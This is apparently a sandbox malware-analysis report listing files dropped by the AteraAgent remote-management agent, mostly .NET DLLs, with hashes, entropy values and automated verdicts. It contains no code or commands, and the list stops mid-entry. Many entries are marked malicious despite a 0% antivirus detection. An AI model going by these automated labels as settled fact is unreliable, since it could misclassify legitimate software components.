                                                                                                                                                                                                                                        SHA-512:C60461AE0FE1DF07D67FC55012DCDA8E2615DBCEAA885EE1DB9FB2E4FCF71990730FBFA10300A957D8E1908D1B9FA61A36A665ED63C934E07958DC73606C5AF3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.5..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253
                                                                                                                                                                                                                                        Entropy (8bit):4.585549446641918
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:3Hp/hdNyhAkI/XCkyFNOJeZS1sHZeQ6NOCUo+K8EkNTy:dFkp5MeU1s5hex+K8Es2
                                                                                                                                                                                                                                        MD5:24E4653829DE1022D01CD7DDD26E2F22
                                                                                                                                                                                                                                        SHA1:9160A009CB381E044BA4C63E4435DA6BFEB9DC6D
                                                                                                                                                                                                                                        SHA-256:DED3AEB5856A11DB0B654A785574490CAB55839EBFB17EFE9E39B89618FC5B91
                                                                                                                                                                                                                                        SHA-512:EFD4BBBA1BAEC0B47003831510E3AA539DB9EF468E0F06BA9D7BA6D0B3800035F7C818D7D90171BFD377EC97D08C4617555BCFF635DD83EFCEB412B1A9CCA820
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "6.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):53840
                                                                                                                                                                                                                                        Entropy (8bit):6.300468155319662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:4dUSqld/oh93y+UR4ULL4L88EKNoo9sXQqt9EpYinAMxCQr:4d2P/phL4L8KGo9sgqt27Hxb
                                                                                                                                                                                                                                        MD5:355567F26142F9101526CB91F98FB03D
                                                                                                                                                                                                                                        SHA1:B7D5B6C9D78A4C7F4775F79F68B640D2E90DF1E0
                                                                                                                                                                                                                                        SHA-256:6D81FB3829261543D93FF02BF239BD25A39E41DCB645381F0A8C9D53E8694A68
                                                                                                                                                                                                                                        SHA-512:C72ADB068410D53C085BC5DEA0CADB6D2C55603566923C12547CA2D897D1F238F706BD1F7A046E97A8A21C95DB4B97EE70A32BD559437508B65887686CDBE6A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66640
                                                                                                                                                                                                                                        Entropy (8bit):6.273913453163328
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:PO4QNCMhTIDWo+hDbEicjIeoCtU1a1ZTG/2u2Xv2vFbanu5fEpYinAMxCIiO:xQTIywi3eobgTG/2u2/wb0u5Y7HxwO
                                                                                                                                                                                                                                        MD5:90916CE0E528B775C1179E96F86CA200
                                                                                                                                                                                                                                        SHA1:6F64812C50EC9E6672CB088903F913168F35430A
                                                                                                                                                                                                                                        SHA-256:BB828056E376EF41E40F212FB6AD2990227CBCF821D4835263180C4768795249
                                                                                                                                                                                                                                        SHA-512:EB027447FB79E3E0A397EF173205596C8DFA936C9CB0F88B9A27ADFBB0F3E1B4E28F18FC907F3BFF2C4A39BB03B8131A5998E90F2BA60E4F522B7BF36D1C18BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):186448
                                                                                                                                                                                                                                        Entropy (8bit):6.958336672022744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:ChOh6zHpz7YSkfd6kUYm4wlb6QAGcbLQpgjOHopZb7UsUDfAbmn1F8mkmBC:ChJ177+9jQAVph4sUDfAbm1F8MC
                                                                                                                                                                                                                                        MD5:6DDA20C58ED67382D0B5D7A17FAF6A4A
                                                                                                                                                                                                                                        SHA1:5C39B32EDAA98E70BF01DACE2C59D6EC304F8DD1
                                                                                                                                                                                                                                        SHA-256:43EFFADADAA2FD01EE7DB52BFEC67F9A1E9E2F8FC276B4EC244BB24B854315BB
                                                                                                                                                                                                                                        SHA-512:8984AFB415FC19ABB4358455DE47FD4FB3EE75F005772AF4204508F1DB47B21E93EAAC7410FB5001BC59F922A5489599FAFCBF589B6DCBD891C9686C8BF46B71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29264
                                                                                                                                                                                                                                        Entropy (8bit):6.524120604887875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9+q+2Vv/+usFlLVyKo/9ETG/DwzzRjz69M1ZVMdWs6NWsaaNyb8E9VF6IYinAM+R:9+EF/CvyKohrqnDEpYinAMxCtz
                                                                                                                                                                                                                                        MD5:8A86E5FF5D774C00992E276CFACECF80
                                                                                                                                                                                                                                        SHA1:F19FD07AE29B32579E75A0E4E738EF878835A037
                                                                                                                                                                                                                                        SHA-256:BB6667D93A1258A76DF2C007083A1E7CC000BB5BEA3195544EAC733C6259A540
                                                                                                                                                                                                                                        SHA-512:B35960BB4908F05602D375AD24316E293B05FEC90A6E366D32F3CA7CA37BDBE0158F572EAA7BB8C6C387691DAA2AE213258603E4658BA99767FDC0D9BE4E5972
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42576
                                                                                                                                                                                                                                        Entropy (8bit):6.408969180714612
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:uThLeDjUB16TI1CQ12cMcFgL/l5d4EpYinAMxCB:uTvB71dEcME45dB7Hxy
                                                                                                                                                                                                                                        MD5:071B50004B2ABE329A964ECD09A7E896
                                                                                                                                                                                                                                        SHA1:08D2A3056856235113C43CA3FA27D47C759F7EB6
                                                                                                                                                                                                                                        SHA-256:E8C446C1ACC2E0BC2DC9A80E286456B9A84B5DB5B1D4101C612BBFBD331EE0A9
                                                                                                                                                                                                                                        SHA-512:6608AA59D25BB19F7B34717083C8BD60CFAFD299D982445BC491C12E265C9BDFE92A23CCE45074583184C6F2A128CD2646EF05DF59FC82C7B5CF4D8F3046E19E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25168
                                                                                                                                                                                                                                        Entropy (8bit):6.670940956884048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wYEMITBweJkneGO3WKGW9anWsVNyb8E9VF6IYinAM+oCOScXu:2TBwa7dEtxEpYinAMxC+u
                                                                                                                                                                                                                                        MD5:D950E5EC874F7C62306B93500FD36BBA
                                                                                                                                                                                                                                        SHA1:530F5F348CE9B50C396629A16F6F815F2495722F
                                                                                                                                                                                                                                        SHA-256:416CCF9CDAB49BB9DC2B4259E0D5B4434540AC82C1BC166F85D3CBD9F8942D4D
                                                                                                                                                                                                                                        SHA-512:B374D9A55A99603CD623D0876CEB8235FC235A09C8DA9BD0FEF9AFB2EA11574811E9073AFAF6DB56697AA3E75546BC61F029384404544D0299046EF239406E96
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21584
                                                                                                                                                                                                                                        Entropy (8bit):6.717352450932083
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N6jxRm3soGTeZeszQm31WUKeWsJNyb8E9VF6IYinAM+oCen75ikD:Mj23spTeZposNEpYinAMxC7kD
                                                                                                                                                                                                                                        MD5:C2177320BC76C026D8C554D8CFEC1F2F
                                                                                                                                                                                                                                        SHA1:A208DC6AE7A5FE8FBAF5F5FDAC980B0360A667EC
                                                                                                                                                                                                                                        SHA-256:F971952E34D3BFA8263D8B5FD7F4F251B9D8C969E3EC2325AF0A3BFFD43DC946
                                                                                                                                                                                                                                        SHA-512:39A7258DF35A89A6A9B68220CA0AD159839739F8EC6DF987EE7C53CEBC2B55C44A3FD81718F620B45B14EB6AF2075A1AD5DDFA895CF34B71A0947B1BEF7CE389
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28240
                                                                                                                                                                                                                                        Entropy (8bit):6.602224449204335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pzp434gr92+liFe/5XjtCZ0UaFoSc43IXABPpBzWq66WstNyb8E9VF6IYinAM+ox:5xk1/9jtGhScRwPpByoJEpYinAMxC8LX
                                                                                                                                                                                                                                        MD5:A9BB401E3DE7FB6FC038DC6BDC27591B
                                                                                                                                                                                                                                        SHA1:CB1CC3D6E4A603C1B25350D5E5581193A80D3D9C
                                                                                                                                                                                                                                        SHA-256:1B15C473C30E52A08ABDA9FFF9099E5A51EB8DB5733A7EFA29FCCEA2C17BDB6A
                                                                                                                                                                                                                                        SHA-512:EB5C0910134420FB6717039FD95CC819C24FA0F3288A83DD43363CFD902D3FD39686B3E0D74D29B0604DD771D7215DFF2EE39713D49A760E2113B86CF98BBAAC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27728
                                                                                                                                                                                                                                        Entropy (8bit):6.567134242779113
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SXLAulT7JkcAoWovkT7jF6zOFz3Ge1l68mWka2WsCNyb8E9VF6IYinAM+oCltvGw:mLAux7yUcT7jF6aYhSkCEpYinAMxCv
                                                                                                                                                                                                                                        MD5:97C4011B8FC681C68FC0D9A0AFE05134
                                                                                                                                                                                                                                        SHA1:E3C5A7264874ADAF421303D679637C35DC3A1EBB
                                                                                                                                                                                                                                        SHA-256:B9FA3DFD672088A280B1B6AFB38E9539B195B85D8351F6753D064D10F23A8617
                                                                                                                                                                                                                                        SHA-512:70CA32792A0FB2325BC511FA1A298D1D03AA7D8E72B6F1F05443C0FE2D8B01521A745F4F1C8D7CE1FC27E6AEE112E8C499B2FF79C885BADC774EDD942C732906
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26192
                                                                                                                                                                                                                                        Entropy (8bit):6.549189808431148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pMvnbB39p5YGTv9uuM1iFSF3yE1LlW9KCWs7Nyb8E9VF6IYinAM+oCUYO39:pKnbPplTv9uuLuVwXEpYinAMxCq39
                                                                                                                                                                                                                                        MD5:7D44B25B42F8273E1B95DB0D73671E84
                                                                                                                                                                                                                                        SHA1:265714D11A304A27443F9DBAFB33A2987C5AF845
                                                                                                                                                                                                                                        SHA-256:823154871F155DDCCB8DBE9DCC3078263A6C296D32524564E90B106930992987
                                                                                                                                                                                                                                        SHA-512:563E7DB622C13C19BA81E5C123C812A8FBEB4D50C6BB2A1686C728180A26CC246D369B1BB5B8536D28A2105CA9D8DA7C8108AE3EBE302CC180EF29BFA5C8B3A2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41040
                                                                                                                                                                                                                                        Entropy (8bit):6.41098819814607
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:e054t3ibki5TCk3jqEr0WBum6JEpYinAMxCmd:ePtnUj/Lkmp7HxZd
                                                                                                                                                                                                                                        MD5:CA14EEE1F7605296B50D9471B3846A1A
                                                                                                                                                                                                                                        SHA1:E26129A1044FA6A4A85A8890D3569C3900E338D2
                                                                                                                                                                                                                                        SHA-256:F7CAB383114EDE19662B14EFADEAD8E76FE59954DE5464BA64E270587D738206
                                                                                                                                                                                                                                        SHA-512:8EF77602DD6D4F86E3607A287F8E07567B216D73FA442FD7B9165B1087D2712817FAB690107EC23929EB519560CFAC897FE6C794B941A6E69CEE6D3CF661DE63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):45136
                                                                                                                                                                                                                                        Entropy (8bit):6.259777287029036
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Kq+RszBJV7CkN9YxrIvw2DLBjYAQP0+lyJ9PPAEpYinAMxCsi+x:Kq+SSkNNjdQc+cJNh7HxJiy
                                                                                                                                                                                                                                        MD5:0E56D17A0B873639366047CE26A5E063
                                                                                                                                                                                                                                        SHA1:491A1C758D27BBA08ACF9CFC87468988545835F0
                                                                                                                                                                                                                                        SHA-256:559CDE153D2C725745796BE20B7FE5C197DBAFBFBC3A2D4C44CC025DD75AF8ED
                                                                                                                                                                                                                                        SHA-512:A026E4CA433846D0DC3FB53826770DB45C8D765B1705D6C0DF45991440809AF2134F8608E2E0DCABBBD539049E72DA701F2951337B6CFB3ADDE43A72A739A578
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):85072
                                                                                                                                                                                                                                        Entropy (8bit):6.2673588925221
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:nNNgvCsvGPrpqSMo4Z9M4IIWSYe2Kbj5u6fjQ+7PMMcmnJz7Hxfp:nMCsvGPPed5ZfjQ+rBvJzFp
                                                                                                                                                                                                                                        MD5:68E188489CD2966EF4B9E8864B5236ED
                                                                                                                                                                                                                                        SHA1:23A5FEA5C4787804CF140741AA35F7CC55229977
                                                                                                                                                                                                                                        SHA-256:97BA41B72AE55EA3FC47A6D48769638F608F8AD498A0A81E4780C42C45F34BC5
                                                                                                                                                                                                                                        SHA-512:C14EACFA5ACCAFE998FD55868A91FAFDB3A23031A6DBECCCD76ADAE1E4F43C414C6C3AEBA4D4F4FEF04E0FCA8CB6B7F08017937E353522775924F1992377235A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23632
                                                                                                                                                                                                                                        Entropy (8bit):6.618432341469682
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:OVAko1Z0S/oj6ETt9EQMVSz3PMA2oWs6hWso4Nyb8E9VF6IYinAM+oCqJ2qui:O3m0SM3Tt90Pl7fEpYinAMxCa3x
                                                                                                                                                                                                                                        MD5:AC95850E08238CF3A6FFC51D47BCC1DB
                                                                                                                                                                                                                                        SHA1:06CC0E13887DC0030A0DFFE067E01BE77D75CF4B
                                                                                                                                                                                                                                        SHA-256:B788F714E91102C2D34FF5E20A07F7408E9EF74343871942E5889612EBBE70A5
                                                                                                                                                                                                                                        SHA-512:58B35DA53926365A3502BCDE514E34C3159EC5DF7672527C884FF5057FF1089F0124EE79F66EA79E6004DF4CD14805C4495C43AC0C38AA07851303F3FAFADF15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):45136
                                                                                                                                                                                                                                        Entropy (8bit):6.430057016218873
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:FxddbVKFC/2DfTMFeuzpdUTVoIEu3GzN/EpYinAMxCMe:FNxxAYFeMpdURZEu3S+7HxZe
                                                                                                                                                                                                                                        MD5:123D79B76609A0E1B4E7977FF4283822
                                                                                                                                                                                                                                        SHA1:E4F25CDDCF76FFB2569D22D2090D32B33A98512B
                                                                                                                                                                                                                                        SHA-256:871B2C2230BF4079699D34AFD6A262B7FF362431D7B2A0F4C3539A6F7D1C267C
                                                                                                                                                                                                                                        SHA-512:C4EF8889F3DED86FBDE77EFB0A017B14F6888984F0F9A7B12FCC6CD782816B78878B0F853EF2BCF0A18F6C7966D8E495B62CF11B8EBDDBA94440FFA2F2A51AF6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):47184
                                                                                                                                                                                                                                        Entropy (8bit):6.373451878905772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ekfEnkM0vRbJ05axPAONhO+JZIkp5ygv/MFKEpYinAMxCz:LEkMoRxtzIk3ygv/Mp7Hxw
                                                                                                                                                                                                                                        MD5:83CBC69E9A528F906F2EB5B9528FA378
                                                                                                                                                                                                                                        SHA1:0638CA4EB918BD9A7D68C5731D831B57E5D48019
                                                                                                                                                                                                                                        SHA-256:5F7223586AE47F001319524B3A9BC4B635A0D44870733D46FF1BFF780485C4C2
                                                                                                                                                                                                                                        SHA-512:DD817FBDA24F1DC42C83C44D8A301123D5751895F5C542FDF3CF82CA1459B7728D897C3B3C5F1E1915282B7B4968F93ECB6D0DB4ECF80E79093C4F2B47B9420B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33872
                                                                                                                                                                                                                                        Entropy (8bit):6.465515280994496
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Tup+kjcS4GAF7ItpTYbg8lAZnsboXAEpYinAMxCnpD:Ti+YoF7Itmbg82sboZ7HxS
                                                                                                                                                                                                                                        MD5:B4B6928B6ABD9BA62549019FC1B6FF19
                                                                                                                                                                                                                                        SHA1:AFD5DEB02D315D70867335839BA2208DCDD94D88
                                                                                                                                                                                                                                        SHA-256:03BCCF47620E2795ACDF4519C3E21E2C9009908A7B4CF39312DF8560CD3B4815
                                                                                                                                                                                                                                        SHA-512:219472590F21237FBBC3F6F31D4C1320E356C5C13DA41AB0B538A2E9F0788B59E4E847E52177719F90B90BCDF496E21CA5A894E019C5BFF923AEFD1774E07ADF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66640
                                                                                                                                                                                                                                        Entropy (8bit):6.302989427949227
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:syK1UG8tMAv0by0P/vGCnbr1hmiBPIIk+n7Hxu:sykl8tla/nbr1kiBx3nI
                                                                                                                                                                                                                                        MD5:3FCB549ECB9D84B10FEF1727AB043DF0
                                                                                                                                                                                                                                        SHA1:BDA06DB4121EC85DDF7F2259D92CFB90C0C18734
                                                                                                                                                                                                                                        SHA-256:AA96A108023C9FE0A430AAE727F8C8D296B72D781A49E14C73BF5FF33EC792D0
                                                                                                                                                                                                                                        SHA-512:5BBC0A63ACC4D4E3264234D472DD6EE5ABCFB762240B2B868DC344530AA520979C06B02A1BAAF43CD3B293EF3D1F8FDE7341E0413A4A9436473DBE3BF3E4A462
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69712
                                                                                                                                                                                                                                        Entropy (8bit):6.226077670195515
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:VsDE/e+9cxoZhNyjcMiJSAopUx+ZA7Hx0:GDE2HozNyjcf4o2Am
                                                                                                                                                                                                                                        MD5:3CE2B431D7D349BABEE6937AD0851309
                                                                                                                                                                                                                                        SHA1:55FF7B9337EAE6B278756C8FCB8C021E04A1AEFD
                                                                                                                                                                                                                                        SHA-256:10E29D6B33B40B7D82298E40A19AC06362B1A51BA5C94C3A7359F5462EB22697
                                                                                                                                                                                                                                        SHA-512:07857ACE3128BFB698EF44524451F6E07596EF48F39F8806428473CABC0C71C2348601519BCC6A58237C919F0E1212021525544C8F8A15CCAAC4912ECEFCDF70
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64080
                                                                                                                                                                                                                                        Entropy (8bit):6.289710606184699
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:M5PhAi33m3UOZsd4IZnuQDLtfjfC67Hxx:gPhAi33mhZiHlvtbfC6P
                                                                                                                                                                                                                                        MD5:31CD265714D3C3120210364A14DD572D
                                                                                                                                                                                                                                        SHA1:C5F8727A6E42429D2CF37B59B8A523844964C623
                                                                                                                                                                                                                                        SHA-256:8FD8996D02C0A89E548069CF924B4E94250C5B4D11261E6D327657F9717E33B6
                                                                                                                                                                                                                                        SHA-512:9B238628C89D4F72638DDDEF2FBB1155DA7917A56BBF749B96855822802ABAA4B76FE003721E17560E802A1B3478A49A3DE7C02F6F45B8DA54028203DB97D511
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28240
                                                                                                                                                                                                                                        Entropy (8bit):6.542681843112789
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:31YBj07ZyQvkBd9aocTPMuiEjYpR6K698kwgcWWxseU7RWsjNyb8E9VF6IYinAMh:l4jUv6iT9jsi8HyeU7L/EpYinAMxClNQ
                                                                                                                                                                                                                                        MD5:5D53FBFB6C56DAB2AFC15E814956483B
                                                                                                                                                                                                                                        SHA1:927D7F1B9D0493FAE2C900B73734E5A323ADDED6
